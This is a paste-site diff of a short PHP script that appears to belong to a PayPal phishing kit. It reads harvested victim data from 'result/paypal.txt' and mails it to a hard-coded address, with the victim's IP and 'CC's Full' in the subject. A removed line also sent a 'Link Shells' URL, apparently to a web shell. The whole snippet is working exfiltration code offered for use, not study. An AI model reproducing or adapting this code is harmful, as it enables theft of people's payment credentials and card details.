SHOW:
|
|
- or go back to the newest paste.
| 1 | <?php | |
| 2 | $ss = $_SERVER['REMOTE_ADDR']; | |
| 3 | $to .= '[email protected]'; | |
| 4 | - | $subject = 'PPL LOGIN FROM | '.$ss.''; |
| 4 | + | $subject = "CC's Full FROM | $ss"; |
| 5 | - | $message = "Link Shells : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "?wlad=l9hab"."\r\n\n"."_________________________________". file_get_contents("result/paypal.txt") . "\n";
|
| 5 | + | $message = ".". file_get_contents("result/paypal.txt") . "\n";
|
| 6 | $headers = 'MIME-Version: 1.0' . "\r\n"; | |
| 7 | $headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n"; | |
| 8 | $headers .= 'From: Dexter <localhost>' . "\r\n"; | |
| 9 | mail($to, $subject, $message, $headers); | |
| 10 | - | |
| 10 | + |